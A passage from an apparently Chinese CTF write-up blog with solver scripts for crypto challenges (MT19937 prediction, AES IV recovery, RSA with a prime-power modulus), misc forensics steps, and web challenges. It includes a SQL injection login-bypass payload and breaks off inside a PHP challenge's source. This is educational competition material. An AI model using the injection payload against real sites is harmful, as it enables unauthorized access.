class="hljs-number">1786133397</span>, <span class="hljs-number">264814384</span>, <span class="hljs-number">1969519378</span>, <span class="hljs-number">1769400868</span>, <span class="hljs-number">3098042628</span>, <span class="hljs-number">22547518</span>, <span class="hljs-number">3195136230</span>, <span class="hljs-number">42683806</span>, <span class="hljs-number">1288550835</span>, <span class="hljs-number">59638233</span>, <span class="hljs-number">3534385409</span>, <span class="hljs-number">2517101496</span>, <span class="hljs-number">3632913591</span>, <span class="hljs-number">3894777481</span>, <span class="hljs-number">2912655780</span>, <span class="hljs-number">1614602217</span>, <span class="hljs-number">3498478791</span>, <span class="hljs-number">1309795895</span>, <span class="hljs-number">3961554801</span>, <span class="hljs-number">3625321205</span>, <span class="hljs-number">308138165</span>, <span class="hljs-number">2885107341</span>, <span class="hljs-number">1003378866</span>, <span class="hljs-number">3462951062</span>, <span class="hljs-number">1914176024</span>, <span class="hljs-number">3130918711</span>, <span class="hljs-number">3919345882</span>, <span class="hljs-number">3556964414</span>, <span class="hljs-number">2382442356</span>, <span class="hljs-number">3968605965</span>, <span class="hljs-number">2388890395</span>, <span class="hljs-number">1955471760</span>, <span class="hljs-number">2358533573</span>, <span class="hljs-number">2323037969</span>, <span class="hljs-number">4273118548</span>, <span class="hljs-number">3577096972</span>, <span class="hljs-number">4251790958</span>, <span class="hljs-number">2321545863</span>, <span class="hljs-number">2057106840</span>, <span class="hljs-number">4000766037</span>, <span class="hljs-number">1551111470</span>, <span class="hljs-number">368761666</span>, <span class="hljs-number">951769999</span>, <span class="hljs-number">778229999</span>, <span class="hljs-number">4235748487</span>, <span class="hljs-number">2020142699</span>, <span class="hljs-number">3577752281</span>, <span class="hljs-number">1269488993</span>, <span class="hljs-number">1350156870</span>, <span class="hljs-number">529843408</span>, <span class="hljs-number">669182431</span>, <span class="hljs-number">3871401874</span>, <span class="hljs-number">2180265713</span>, <span class="hljs-number">3850183472</span>, <span class="hljs-number">46915226</span>, <span class="hljs-number">3150800412</span>, <span class="hljs-number">1139932212</span>, <span class="hljs-number">2523557119</span>, <span class="hljs-number">1462042012</span>, <span class="hljs-number">301258444</span>, <span class="hljs-number">165757583</span>, <span class="hljs-number">530704729</span>, <span class="hljs-number">1848179734</span>, <span class="hljs-number">1792342751</span>, <span class="hljs-number">2597916820</span>, <span class="hljs-number">4041946457</span>, <span class="hljs-number">1127104524</span>, <span class="hljs-number">3768573884</span>, <span class="hljs-number">2614008065</span>, <span class="hljs-number">741308521</span>, <span class="hljs-number">477746986</span>, <span class="hljs-number">507411825</span>, <span class="hljs-number">4235293189</span>, <span class="hljs-number">2251811519</span>, <span class="hljs-number">811234592</span>, <span class="hljs-number">1985999307</span>, <span class="hljs-number">844715613</span>, <span class="hljs-number">1640781314</span>, <span class="hljs-number">3538036580</span>, <span class="hljs-number">2764130557</span>, <span class="hljs-number">2863454433</span>, <span class="hljs-number">1831736583</span>, <span class="hljs-number">3857379783</span>, <span class="hljs-number">658928449</span>, <span class="hljs-number">1149649578</span>, <span class="hljs-number">103125751</span>, <span class="hljs-number">2968446555</span>, <span class="hljs-number">885660863</span>, <span class="hljs-number">707321834</span>, <span class="hljs-number">1728646363</span>, <span class="hljs-number">2706995220</span>, <span class="hljs-number">3062604255</span>, <span class="hljs-number">4177710084</span>, <span class="hljs-number">3076079677</span>, <span class="hljs-number">879366858</span>, <span class="hljs-number">3936728615</span>, <span class="hljs-number">8828906</span>, <span class="hljs-number">1656874220</span>, <span class="hljs-number">2904085639</span>, <span class="hljs-number">397694272</span>, <span class="hljs-number">1604508691</span>, <span class="hljs-number">2083663236</span>, <span class="hljs-number">2138468690</span>, <span class="hljs-number">1365350684</span>, <span class="hljs-number">2870684769</span>, <span class="hljs-number">384435793</span>, <span class="hljs-number">1063724290</span>, <span class="hljs-number">1142482048</span>, <span class="hljs-number">809857977</span>, <span class="hljs-number">4192515435</span>, <span class="hljs-number">267878653</span>, <span class="hljs-number">206018017</span>, <span class="hljs-number">3441769173</span>, <span class="hljs-number">925696591</span>, <span class="hljs-number">2250932557</span>, <span class="hljs-number">1973183700</span>, <span class="hljs-number">577661907</span>, <span class="hljs-number">2551314381</span>, <span class="hljs-number">1350352597</span>, <span class="hljs-number">4151551172</span>, <span class="hljs-number">774849773</span>, <span class="hljs-number">2391866106</span>, <span class="hljs-number">3444137245</span>, <span class="hljs-number">403261487</span>, <span class="hljs-number">2724363448</span>, <span class="hljs-number">3572536490</span>, <span class="hljs-number">1077243504</span>, <span class="hljs-number">302416473</span>, <span class="hljs-number">3457548858</span>, <span class="hljs-number">564604707</span>, <span class="hljs-number">1238169871</span>, <span class="hljs-number">2356838464</span>, <span class="hljs-number">3083335214</span>, <span class="hljs-number">3844937218</span>, <span class="hljs-number">1272458074</span>, <span class="hljs-number">1782962159</span>, <span class="hljs-number">1543604321</span>, <span class="hljs-number">3212537899</span>, <span class="hljs-number">426074894</span>, <span class="hljs-number">3053843067</span>, <span class="hljs-number">2436223151</span>, <span class="hljs-number">94019340</span>, <span class="hljs-number">4147659323</span>, <span class="hljs-number">2893920832</span>, <span class="hljs-number">626619793</span>, <span class="hljs-number">3976626567</span>, <span class="hljs-number">1884877146</span>, <span class="hljs-number">2696384440</span>, <span class="hljs-number">1177352315</span>, <span class="hljs-number">1082374195</span>, <span class="hljs-number">3289271804</span>, <span class="hljs-number">1485815836</span>, <span class="hljs-number">120127000</span>, <span class="hljs-number">3349349501</span>, <span class="hljs-number">164243314</span>, <span class="hljs-number">1703351326</span>, <span class="hljs-number">1017276501</span>, <span class="hljs-number">413737931</span>, <span class="hljs-number">408060344</span>, <span class="hljs-number">472141408</span>, <span class="hljs-number">172738862</span>, <span class="hljs-number">4001606849</span>, <span class="hljs-number">1888805432</span>, <span class="hljs-number">2927218529</span>, <span class="hljs-number">1293362241</span>, <span class="hljs-number">1941759619</span>, <span class="hljs-number">1760659398</span>, <span class="hljs-number">274865852</span>, <span class="hljs-number">978985751</span>, <span class="hljs-number">3867215904</span>, <span class="hljs-number">177291528</span>, <span class="hljs-number">1083045308</span>, <span class="hljs-number">3888975618</span>, <span class="hljs-number">979933689</span>, <span class="hljs-number">2211634008</span>, <span class="hljs-number">3899294132</span>, <span class="hljs-number">1174569575</span>]<br>Hash=<span class="hljs-string">'b0cfb7293d6842e3279f4ef0fc88284174349e111e5b9beb28263df72c9db0bf'</span><br>res=<span class="hljs-number">1045726758250168034320246515934682860724576730763168865120</span><br><br><br><span class="hljs-keyword">from</span> mt19937predictor <span class="hljs-keyword">import</span> MT19937Predictor<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br>predictor = MT19937Predictor()<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> randist:<br> predictor.setrandbits(i, <span class="hljs-number">32</span>)<br>x = predictor.getrandbits(<span class="hljs-number">128</span>)<br><br><span class="hljs-keyword">from</span> os <span class="hljs-keyword">import</span> urandom<br><span class="hljs-keyword">from</span> hashlib <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> tqdm <span class="hljs-keyword">import</span> tqdm<br><br><br><span class="hljs-comment"># for i in tqdm(range(256)):</span><br><span class="hljs-comment"># for j in range(256):</span><br><span class="hljs-comment"># for k in range(256):</span><br><span class="hljs-comment"># if sha256(i.to_bytes(1, byteorder='big') + j.to_bytes(1, byteorder='big') + k.to_bytes(1, byteorder='big')).hexdigest() == Hash:</span><br><span class="hljs-comment"># print(i.to_bytes(1, byteorder='big') + j.to_bytes(1, byteorder='big') + k.to_bytes(1, byteorder='big'))</span><br><span class="hljs-comment"># exit()</span><br><br>tmp = <span class="hljs-string">b'\xfeV\xe8'</span><br><span class="hljs-comment"># y = predictor.getrandbits(192)</span><br><span class="hljs-comment"># print(res ^ y)</span><br><span class="hljs-comment"># print(bin(3096872116674666632134706098360014813425478687167245803096)[2:])</span><br><br>res = <span class="hljs-string">'11111100100110011011010100000010100111101010001110010110101000111010000101111001111100001100100001111110000100000010001010110111001001000101111101101110101101110110111010111010101111001011000'</span><br>n3 = res[<span class="hljs-number">151</span>:]<br>n3 = <span class="hljs-built_in">int</span>(n3, <span class="hljs-number">2</span>)<br>n3 = <span class="hljs-built_in">hex</span>(n3)[<span class="hljs-number">2</span>:]<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">affine</span>(<span class="hljs-params">s</span>):<br> <span class="hljs-keyword">return</span> <span class="hljs-built_in">hex</span>((<span class="hljs-built_in">int</span>(s,<span class="hljs-number">16</span>)*<span class="hljs-number">13</span>+<span class="hljs-number">7</span>)%<span class="hljs-number">16</span>)[<span class="hljs-number">2</span>]<br><br><span class="hljs-keyword">from</span> string <span class="hljs-keyword">import</span> *<br><br>flag3 = <span class="hljs-string">''</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">str</span>(n3):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> digits + <span class="hljs-string">'abcdef'</span>:<br> <span class="hljs-keyword">if</span> <span class="hljs-built_in">hex</span>((<span class="hljs-built_in">int</span>(j, <span class="hljs-number">16</span>)*<span class="hljs-number">13</span>+<span class="hljs-number">7</span>)%<span class="hljs-number">16</span>)[<span class="hljs-number">2</span>] == i:<br> flag3 += j<br><span class="hljs-comment"># print(flag3)</span><br><span class="hljs-comment"># 64406e6365</span><br><br>tmp = <span class="hljs-built_in">int</span>(tmp.<span class="hljs-built_in">hex</span>(), <span class="hljs-number">16</span>)<br>n2 = <span class="hljs-built_in">int</span>(res[<span class="hljs-number">127</span>:<span class="hljs-number">151</span>], <span class="hljs-number">2</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(n2 ^ tmp)[<span class="hljs-number">2</span>:])<br><span class="hljs-comment"># 6c795f</span><br><span class="hljs-comment"># for i in range(10, 135):</span><br><span class="hljs-comment"># n1 = int(res[:i], 2)</span><br><span class="hljs-comment"># if len(hex(n1 ^ x)[2:]) == 32:</span><br><span class="hljs-comment"># print(i)</span><br><span class="hljs-comment"># print(hex(n1 ^ x)[2:])</span><br><br><br><span class="hljs-comment"># flag = 0x16ef9b7e65eaccdac7f2a82242f97461fe795f64406e6365</span><br><span class="hljs-comment"># print(n2s(flag))</span><br><span class="hljs-comment"># flag = 0x365ac09e91965ba65b83ea0952bf789afe795f64406e6365</span><br><span class="hljs-comment"># print(n2s(flag))</span><br>flag = <span class="hljs-number">0x7730775f796f755f63616e5f7233616c6c795f64406e6365</span><br><span class="hljs-built_in">print</span>(n2s(flag))<br><span class="hljs-comment"># flag = 0xf5e518dca89d28ad12a466f3332b5280fe795f64406e6365</span><br><span class="hljs-comment"># print(n2s(flag))</span><br><br><span class="hljs-comment"># flag{w0w_you_can_r3ally_d@nce}</span><br></code></pre></td></tr></table></figure><h4 id="Puzzle"><a href="#Puzzle" class="headerlink" title="Puzzle"></a>Puzzle</h4><p>先不断用c3pto函数得到key的值,因为在明文前面填充了iv,所以第一轮CBC加密时相当于0。因此先用ECB模式加密16个0就可以得到iv的值。解密之后去掉前16位iv再b2l得到n的值。又因为n是p的k次方,k是3到10的随机数,所以可以通过iroot来爆破得到p和k的值。然后phi就是p^4-p^3,常规rsa解密即可。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> Crypto.Util.number <span class="hljs-keyword">import</span> *<br><br><span class="hljs-comment"># ans = 38003142990385686484863558905791098358375993231657244276476071305023256088640</span><br><span class="hljs-comment"># for i in range(3000):</span><br><span class="hljs-comment"># ans = c3pto(ans)</span><br><span class="hljs-comment"># if len(long_to_bytes(ans)) == 16:</span><br><span class="hljs-comment"># print(long_to_bytes(ans))</span><br><span class="hljs-comment"># print(i)</span><br><span class="hljs-comment"># break</span><br>key = <span class="hljs-string">b'\xe3+\x91\t\x98\xf3\x1e\xc1:GdW\xa7\x9c\xed\xc8'</span><br><br>cipher = <span class="hljs-string">b'GuGfliJiRkNsUbbmB+g/q4U3z6YahJ6G1Q9bg6ZT/ilJnkNMICmQYMFuhlNBuVZHfJJIFwwFJ5FKG+z9zSXalJq6quN6d3CSYSMHvYk04Orpn76Y2VQX5qQk72uCssd4x5KNIOmX0CvzJmjTWjLvL1U5twQupfkuDr/axqyHFss3pJkj9o0IRZmtz87bi5WojeUjOaayQ0RNenJJzhJ+zFJwdUCpUhwotHxLOPsUXYSoY7AKPwj53Dlsy0deNBKFN89BolC4pTwHWvn0M/8eu9kIze+5sQuKrk0VI5ASNzA6PRp1owpgsxNuy18k6/y01+mVheQkFrH2IrFNgqe3+Gu/PXEDPi3G2nAIi/4Xf9QI0DNH+hkoN40zWaX3OkEVQeLQ9o/KuggeoajYwDusFyQxOQZYFr5I+v8uBApcQz29bKIRiZX78r9YN3IaSsL0JgLPQPYaNPNiZMm5pqmv/zV0poZikYGYJsAwfjLJ/CYQ/iLBhkhKZoE9VxYEae7Wga1jwpJb3h/lA3mbvQofMTR6ivnSZHzUu3elxMFTgTi5adB4PsBdke0YRXlWP8/AoggBAN5OMw8n2LCASIhp7q/1iljNUuw/40mBCt75jszo1eBBDAbP7/DjXL5hUHFgen6xjedcySq/H0ibyNGasyePs3e+igr78fHyvXyIYYPaEtM4RjC3j3TXheRYRo9lObJgHUHSY0PgAgrqc1rECexNa+QCvzzapemNAEE9OT8YLOEkB6zzpSrZ6k/NR9KffGnqplQlWAfXdDrf3SsOmWVJ3G6DvmpTCukQgVYn+DCv5LdSSUZo2hjxBHPv8C5zpZiasPLDr+2CwUvccettO3wwrWQ1bPfRBZ7OSghvipbYI7awjt45tyxT5TopN7e3kud1s4bdm7da/KQDDQ3pxylH7Kc2b8wWfptW2t9wEoqdjNezr24E+/c6kNIo9TmZ8mPigNBz/d7Sd5TzxhstmXoXscAvFLpc7B/RhD5qwXWlYZwisemsTL6GVgBpaWI0zp4pk4DaQcT7FM17qddeHCiF5YD9g6TZBkYXnvke5hW1JERYny3GjTNum8P3p9L3NHWpfAK2S90ChRwDb3nDy81B6b6K+YMNsJmmMjJhE/GbP6jMFE/2cLIAsAT+Ssk/zNEJKXKe3gN4pQzBcDJksDxrlYJoYQE/rz1Ni7EpKiuuEUtODcGSCcRagh6t6cJVyDh76DgxgjAvjATjPS6bdJ5PQWocTtjoMUvkMjbeEoWMuoe5cgsHl3HoYsLyxWwk1zn4BVSdjumiD0o8juKUTFsFjN8yyNQyAA4KNRrhrIBdK8VTcsJC5JFjJnJiX1P6yrUWZPnH4YB3wIZwA5EkXjlgtNrZghyWTMNoMs4GH6A='</span><br><span class="hljs-keyword">from</span> base64 <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># print(b64decode(cipher))</span><br><span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES<br>aes = AES.new(key, AES.MODE_ECB)<br>iv = aes.encrypt(<span class="hljs-string">b'0'</span>*<span class="hljs-number">16</span>)<br><span class="hljs-comment"># iv = b'<\xf1t)J\xb94\x94\x96k\xb3\xa6\xd0l\x1f\x18'</span><br><span class="hljs-comment"># print(len(iv))</span><br>aes = AES.new(key, AES.MODE_CBC, iv)<br><span class="hljs-comment"># print(bytes_to_long(aes.decrypt(b64decode(cipher))[16:]))</span><br>n = <span class="hljs-number">192099659971585644585994265356151893462377034960456794411988891865292985043855003153008582523342780428794810302819600257505211543181857907106415116235678327109890992104863370288179222517757670217778339429390238355802091081769000348240713104001227465195009290503347809694648095737603288589286587488951249122808668565718081375241590144993161651582987613212486939491481151331461062699460189663231086086438368188327851901136662178362187582946879512941211019554239356512237609083714797677920647956302526035540976096625395045576074618882913271336136197136983455626303177930159461486947144900160609689255459511724884379858318269727855760842754096692298627624434916921714588784746851193083162412064551556945404206854303755771760752959780690233660596074620616291920828653736584021095005924141651891036415545086668712524203621422434855332350634434410255685899978575653707114060202874964589333127633649581915659487394392054766924938473585908627256425677898409670003835577877230695953230779772624257018952499735317822119685099669750110189929339815489604592011705747522509443099530871227359100112168474188213599742539558713508525377201675194485642343270883438486906530571528359024979260422106335247512597006126883635090340753475080689838573417741101697005667509804117477078714343224837766971175288554228364175312803060405952234277289653353821049167680289322424370730116331485806992442330752262754657170209301796826520903516939270541484630918051998431104746567068050303837266511857593664457675203874622377426656951134697321668662464768461125119491757074002358277630438779981831394788463952738787381176350532134825112678994090733193226361777537532269515922485937976349665991399772388721397960468392351155664481353730638831836994949983037350384382753327305729403941493686341892251753278811372338966651828844911034352886809190060883995056847456555950315611326987545276629529435068813158170690823902054787362572088738335891773343913632258874832438998334332913261810760087047758552754566575308536675397251987093487164542963055804002441751864022715424662848335470359948420027756835213050500577294799638589135949755879898985814242501638839907383377834819866500082619067419468232672548637154121177897443704368253245514204975147693342503301921844252239673318375741456151277008424086433210309669337358030499431697081307189511178107489812792122478536534259554160073644974772253911579253927334216606449192146737795612311912838169178570116934403812068138348378295739329366212651044519758844001</span><br>e = <span class="hljs-number">0x5b0cd450a7bfb679dc9caa8aa6fc131708fca2a34375d049ac035fb019463d9c3fa11adb0eb51dea1ae85223df59f887a12ab376cbcb272681c3872c57f4da27396052242b608e3ea4ff53061e63bbfdff652ce25f4ce73315fd1a73a5d5e7307402c7a3c6c1a80c63297b441125c38e23729da6473e5dc332e4e7201df25ff6c8b9918b262e56a31bebe13e093e6f4dba47a771961358cedf6d740732425cb708a633d538dcdc12ef7b49ce76aa270f50dd7cc1b879f1d7b19c6ac3b891fe4e20fb7645b7567237775881de7d30ba754d495ffe8ee751d1cfee1c661a2dbf13a53ff1bcf8085b39f6508fbf37137ebad659665fe5fcc67eef02970a44ac675e28103bd10f2045983d5adaa909b18b70a909b08b76c21b2798830276068d0ebd27303985bb5f3e681219a50bc761b7630587743768cf61922804d195e265aaaabb4740a2c5d7e8ff4e1c19cfb534d345f537e95e948591557f3136da617657e24d1904be373f5e7d63af330b837bcc662cbcd801eb436dbbeb714469d227e9f17e118db39eeb42e45455e6daf4d8fe0e19c4457b596c20e1ef8d235b230018a58e1c66c52c7317094aa5797f50a3b5ebe2be2abd1a04d907fbb68919956d7b0939ac0195a3f3bd3eb6f08eef67a895807768250172ec6bb2b35c9962de03df847170472b73981c04f2aef03721554c818ec9eb7f625d1a3fcdcf756adc4b6fd61950724ac2164a94df70f4aa1cc36c51dd2c3b6545c6c2233544254f6a24e6a170918fd0c533734ef859fed3c5d6f1f9acf8d3b77804c98fa5f1429763ebe860a77380a1e94626b46d88e5263855a0a0d226eb7ca64824c9a06acda851e650e6b035c04e27de61cd49ff49ac3ea3407440f9e76ce47c02301c1bc9c28befe0cd1f5b999961b055ffb39e2f451302aaedc5d779da03830bda1ed3ba9be4f23b2381096f3dc60c84a91ba0aa44242cc6aa361e2ecac867a2d1ef6868199ecb3004aa62bd56683c3476a9bd3f0316905e4f83ef5a907d9796231b9f506c82c09c739513a0db04467a071dcc34cb11bbba8cd3f1870174e04160ae74c2160a61a7c472e8edc51e969a2f0fb47cee59b67d401ecb13b06f72dcfb24f5850b8921b8bad14f7c6bd123c13b3a2ea1761fc425066ba107d61e96d2fa9b3ed88befec93578495ef4c7a1eb95d76679d1f5261f0202e1de881c5c5b1fb44f471a75a305d86df1123cd83c8bc9449c73cf34dbd247111c873bc1fc7948863bb59f2ac3d7129c2e7c3e0ef94afb38a01b3e42f83f42a5cc8e14cbe53c0c8d76768cdc98bef921aaca60204519b516d4c9de7cf581eec8a53faa2e2d96722d0ef2c23d5567ba48104890534cd84432565236cb3402504e0feb6c25426c52d2b2b42f10a007cdd38b540cf64a96ee784deb2b595deb4a9497f9a25ab06eab443010b66e7decc162dcbd7de12737d72a46ec0b8151e1ed42716af2c7602692d7c0ea757bc056c89d2640773a4c3c1a2297c87c13676e414003ff3af0d1abb87ba618e24a4dfe05c0b4443bda53d26c7e30f0dec498d9091074fe3444e81b9a4d8d7acc8b1e38f6afc63540a4e8880fd73bd34bc3563cc0a98bd35ce7455d5cf8a114bc2fe2fb9a58e725cc121e4e242fc0a9a8e38615bda67fd9f158e718154eb51d0ec3d941426933e36fba1db0d7b59d52be90aa796895e6a49fed0a7887b8d7c71a9aa023a8dc73391e3d1bfc746cde9f964d99625900624a8eb300f2d7d2f8703f470776088f27aaa72e7607dcd78cf63754cec00db23bb36beb48cffb20a06df884f101a9</span><br>c = <span class="hljs-number">0x26c6b16ed40253ff31bdcd502d63230a9655f29599cfb41a29f10e700589e6a13a8c78f483e0aa8b9353fa258a1437ba15e8d2c8bb2b090a6887740b31d71550745611fabd087904f150b4d928d155a7fcdd1a64c7349ce984dfd08c4c795e93b409f53c1458e6de777dc5993198f4c0648381116fe5cbafa57499d9ce685c625df4797afc344e8fe4a0fc36cf82ba1423c8a4ad7a33bc4cbab25e2df729085f96d3d9d542d981fa46cac8a37ceb70b9f808213845c06b72be7e2d1224e4dc02817bd474c690e43f6d8f1916a20f2e078bfaa604343d695e6f5f88d9f11c43a886ff97d9bd26b0126af40bed8e03a43bf8c912b5b0dd2f9f2e7e99db066759f573cd59a40a554bebdd3e7e0adbc38fcb91adeb72f9dcd30558b082471a02fd9131a61cf29b1f4e38a5d689d8dcd0b8dc29075e3a33b2d6a25bee6ff9e20d269cc088a2b155be76a1531ce30b25edf928990b5143fc5ae2737d8d4070d0517f5137c458d7afed8f51e2c2973dd143235c9deaffe9ce8fbcd767a93573399dafd5ef61408c77302c993354a080684cdbfb7c1eeb6e6be907db790038c7ce62517815d16fe366bd26178f2f05b9e56450814f4ba7ab6cab54c5f78316b0451057785c03a77c20814eb405cd20e5bff5247a12500dd16173125ffdef4fb6317ab942d0d7e0e584a8fd97a8ba8d87fd38127d6d059902a2d48dafd10938ea5d108f3eb986aabf9e212151b0e540bb5fd25888143633be9982395d4d3bef5278be37328e0239569eb511698ef7f9e7e12aa204cb4c069ffcdeecb65f42ba37f7bfd47c4ba8df384a88adf3486b58cc1620185ac81dfb10f591fc82f3ae046341ebd1e8288f10500d6677e91b89729dfd299b74be13a9183725aacb0023f4fb01efda61390b0312d90ff6a9a319433681ad1811efe038fcdeb6dc1c3f594c4f8011aacfee74ea9638fccb3d669435a1208578c934277caa3ec74f9efbb33e024909b121e7b4e48ec94b762fa9dcab8a1c11b86bb9db164c7655504d304661e04e95b0b356f5968334596fb11df95bbdcb3a6618f431c864658827662f760fc86b2136221bd50472dc19c4f177eb5edf7978760dc15150cfda0a3ea649cb672b8f37229298c6edcc630e3ac9a5f43f58a93ba8def335472f7ebdedd7715a27c4ea622344a949bec59af030455ed61911d53388022bd502e800b769ef499f94f02c96f486b40ce68dbdc42e5690ac2992bedf7f0ba384504c32cb00a25d4e125483003152e81ebe9c12d928627d7f14fc3fbdf5141addc477d5ae4f32e64dcb58a6e2cf955ad7ae54e1665b3199bd0fae36b9ec56c09ac00efc9d27e69a93f4e08652edc3340fa2c518d388ee4a005b9c83956b9139b98380f6925a1a4c3e64ff8d96f2827d0d8a25cc72a2c03a28e33871284b46e10c85f2ad75969b1d84e9d88bb4e05d</span><br><br><br><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># for k in range(3, 10):</span><br><span class="hljs-comment"># if iroot(n, k)[1]:</span><br><span class="hljs-comment"># print(iroot(n, k)[0])</span><br><span class="hljs-comment"># print(k)</span><br>k = <span class="hljs-number">4</span> <br>p = <span class="hljs-number">20935418603755826153357961486749000137883878122092541278485245382546346099923598569473814209357669395236788185259189925906627960621490996925200115559569329810746744675867738485473466021581185385430988547168263735484625716958718825113577345085361945421237478366338611831738408648424304228723729310335432168121087334054958276987167490905779911687736536416815227240962562460212183301435420718431023950641725670461044591993133883921646824589614644103106984493917214402278641218422432546374433956301830629567708335305598359150744372547912472684947785245810663217040977994966632748245272393755319650187559761562868158211001</span><br><span class="hljs-built_in">print</span>(isPrime(p))<br>phi = p ** <span class="hljs-number">4</span> - p ** <span class="hljs-number">3</span><br>d = invert(e, phi)<br><span class="hljs-built_in">print</span>(n2s(<span class="hljs-built_in">int</span>(<span class="hljs-built_in">pow</span>(c, d, n)))[<span class="hljs-number">64</span>:])<br><span class="hljs-comment"># b'flag{6354ce3ac23cdfeccf16eb1a53df4423}'</span><br></code></pre></td></tr></table></figure><h3 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h3><h4 id="一袋米"><a href="#一袋米" class="headerlink" title="一袋米"></a>一袋米</h4><p>搜到原题</p><p><a href="https://blog.csdn.net/weixin_46079186/article/details/120941245">https://blog.csdn.net/weixin_46079186/article/details/120941245</a></p><p>将Yahiko.png用winrar压缩成zip,用ARCHPR工具进行明文攻击。解压进docx之后全选修改颜色为红色得到flag</p><figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dns">flag{c05909321b5e318bf6b0e<span class="hljs-number">41586f31882</span>}<br></code></pre></td></tr></table></figure><h4 id="国际歌"><a href="#国际歌" class="headerlink" title="国际歌"></a>国际歌</h4><p>用foremost提取出一张bmp图片,用stegsolve打开,Analyse选择Data Extract,勾选r,g,b的三个0通道,save bin得到flag的图片。</p><p><img src="https://tva1.sinaimg.cn/large/008i3skNgy1gvrkhxfm7wj60ab01u0sj02.jpg" alt="img"></p><h4 id="Host-log"><a href="#Host-log" class="headerlink" title="Host_log"></a>Host_log</h4><p>搜到原题</p><p><a href="https://blog.csdn.net/weixin_46079186/article/details/120941245">https://blog.csdn.net/weixin_46079186/article/details/120941245</a></p><p>写个脚本,先把4个文件放一块,得到所有的ip,一个一个ip过滤,把ip出现多次的都过滤掉了,最后发现了8.8.4.4,只出现过一次。查找到ip:192.168.100.115,账号名:lucy。</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">flag</span>{<span class="hljs-number">192.168.100.115</span>-lucy}<br></code></pre></td></tr></table></figure><h3 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h3><p>web两个送分题。。</p><h4 id="baby-sql"><a href="#baby-sql" class="headerlink" title="baby_sql"></a>baby_sql</h4><p>输入admin 123的时候显示 you are not admin</p><p>然后尝试了一下万能密码 Hack detected 然后fuzz了一下发现好多都被ban了。</p><p>然后之前遇到过BUUCTF的一道题目,是利用到 \ 来转义引号,然后实现注入的。</p><p><strong>payload</strong></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">username<span class="hljs-operator">=</span>admin<span class="hljs-operator">&</span>password<span class="hljs-operator">=</span><span class="hljs-operator">||</span><span class="hljs-number">1</span><span class="hljs-operator">=</span><span class="hljs-number">1</span># <br></code></pre></td></tr></table></figure><p>本来以为可能是考察盲注,结果登录进去就有flag 。。。</p><p><img src="https://i.loli.net/2021/10/25/e6qIF8JRDj1BnzQ.png" alt="1.png"></p><h4 id="Easy-WEB"><a href="#Easy-WEB" class="headerlink" title="Easy-WEB"></a>Easy-WEB</h4><p>打开是个登录框,随便试了一下注入,未果。用dirsearch扫了一下,扫到一个 <code>/.DS_Store</code></p><p>然后看到看里面的内容可以发现 有几个php 文件 。先访问了那个<code>yzmcode.php</code> 没啥思路,后面又访问了一下<code>yfhgyrt.php</code> 拿到源码:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">"content-type:text/html;charset=utf-8"</span>);<br><span class="hljs-keyword">include</span>(<span class="hljs-string">"./flag.php"</span>);<br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-keyword">__FILE__</span>);<br><br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'url'</span>])){<br> <span class="hljs-variable">$url</span> = <span class="hljs-title function_ invoke__">parse_url</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'url'</span>]);<br> <span class="hljs-keyword">if</span>(!<span class="hljs-variable">$url</span>){<br> <span class="hljs-keyword">die</span>(<span class="hljs-string">'Can not parse url: '</span>.<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'url'</span>]);<br> }<br> <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">substr</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'url'</span>], <span class="hljs-title function_ 